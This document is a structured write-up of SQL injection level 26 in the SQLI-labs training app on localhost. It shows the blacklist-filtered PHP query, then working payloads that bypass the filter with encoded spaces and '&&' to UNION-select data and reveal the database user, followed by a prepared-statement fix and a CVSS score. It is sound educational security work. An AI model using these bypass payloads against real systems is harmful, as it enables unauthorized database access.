## Version 2.0
## language: en

Feature: SQL Injection Level 26
  TOE:
    SQLI-labs
  Category:
    SQL Injection -  GET-Error-Based-Spaces-Comments-Single-Quote
  Location:
    http://localhost/sqlilabs/Less-26/ - id (field)
  CWE:
    CWE-89: SQL Injection
      https://cwe.mitre.org/data/definitions/89.html
  Rule:
    REQ.173 Discard unsafe inputs
      https://fluidattacks.com/web/rules/173/
  Goal:
    Check the website vulnerability against SQL Injection
  Recommendation:
    Use prepared statements

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Windows OS      | 10            |
    | Chrome          | 80.0.3987.100 |
  TOE information:
    Given I am accessing to the website
    And the server is running MySQL version 5.7.28
    And PHP version 5.6.40
    And is running on localhost

  Scenario: Normal use case
    Given I am on the main page
    And I can see the message
    """
    ALL Your Spaces and Comments belong to us.
    """
    When I set the "id" parameter
    """
    ?id=1
    """
    Then A new message appears in the screen
    """
    Your Login name:Dumb
    Your Password:Dumb
    """
    When I set the "id" parameter
    """
    ?id=2
    """
    Then A new message appears in the screen
    """
    Your Login name:Angelina
    Your Password:I-kill-you
    """

  Scenario: Static detection
    Given I access to the source code
    When I check the source code
    Then I can see the related code
    """
    function blacklist($id)
    {
      $id= preg_replace('/or/i',"", $id);     //strip out OR (non case sensitive)
      $id= preg_replace('/and/i',"", $id);    //Strip out AND (non case sensitive)
      $id= preg_replace('/[\/\*]/',"", $id);    //strip out /*
      $id= preg_replace('/[--]/',"", $id);    //Strip out --
      $id= preg_replace('/[#]/',"", $id);     //Strip out #
      $id= preg_replace('/[\s]/',"", $id);    //Strip out spaces
      $id= preg_replace('/[\/\\\\]/',"", $id);    //Strip out slashes
      return $id;
    }
    $id= blacklist($id);
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);;
    """
    When I analyze the code
    Then I realize the blacklist function does not check the input properly
    And The query is vulnerable to SQL injection

  Scenario: Dynamic detection
    Given I am on the main page
    When I attempt to inject the "id" parameter as
    """
    ?id=1'
    """
    Then I see an error message in the screen
    """
    You have an error in your SQL syntax; check the manual that corresponds to
    your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1'
    at line 1
    """
    When I inject the "id" parameter as
    """
    ?id=1%27%26%26%271
    """
    Then A message appears on the screen
    """
    Your Login name:Dumb
    Your Password:Dumb
    """
    When I inject the "id" parameter as
    """
    ?id=0%27%26%26%271
    """
    Then The website does not show a message or an error
    And The query is vulnerable to SQL injection

  Scenario: Exploitation
    Given I am on the main page
    And The website is vulnerable to SQL injection
    When I inject the "id" parameter as
    """
    ?id=1%27%a0union%a0select%a01,2,3,4%26%26%271
    """
    Then A error is shown in the screen
    """
    The used SELECT statements have a different number of columns
    """
    When I inject the "id" parameter as
    """
    ?id=1%27%a0union%a0select%a01,2,3%26%26%271
    """
    Then A message appears in the screen
    """
    Your Login name:Dumb
    Your Password:Dumb
    """
    When I inject the "id" parameter as
    """
    ?id=0%27%a0union%a0select%a01,2,3%26%26%271
    """
    Then A message appears in the screen
    """
    Your Login name:2
    Your Password:1
    """
    When I inject the "id" parameter as
    """
    ?id=0%27%a0union%a0select%a01,user(),3%26%26%271
    """
    Then A message appears in the screen [evidence](evidence.png)
    """
    Your Login name:root@localhost
    Your Password:1
    """
    And The query is vulnerable to SQL injection

  Scenario: Remediation
    Given The web site is vulnerable against SQL injection
    And The code does not have prepared statements
    When The web site is using the vulnerable query
    Then The code must be replaced with
    """
    $stmt = $mysqli->prepare("SELECT * FROM users WHERE id=? LIMIT 0,1");
    $stmt->bind_param("i", $id);
    $stmt->execute();
    $stmt->close();
    """
    And The query could be shielded against SQL injection

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      6.5/10 (Medium) - AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    Temporal: Attributes that measure the exploit's popularity and fixability
      6.2/10 (Medium) - E:H/RL:O/RC:C
    Environmental: Unique and relevant attributes to a specific user environment
      5.5/10 (Medium) - CR:L/IR:L/AR:L/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:N/MA:N

  Scenario: Correlations
    No correlations have been found to this date 2020-03-05
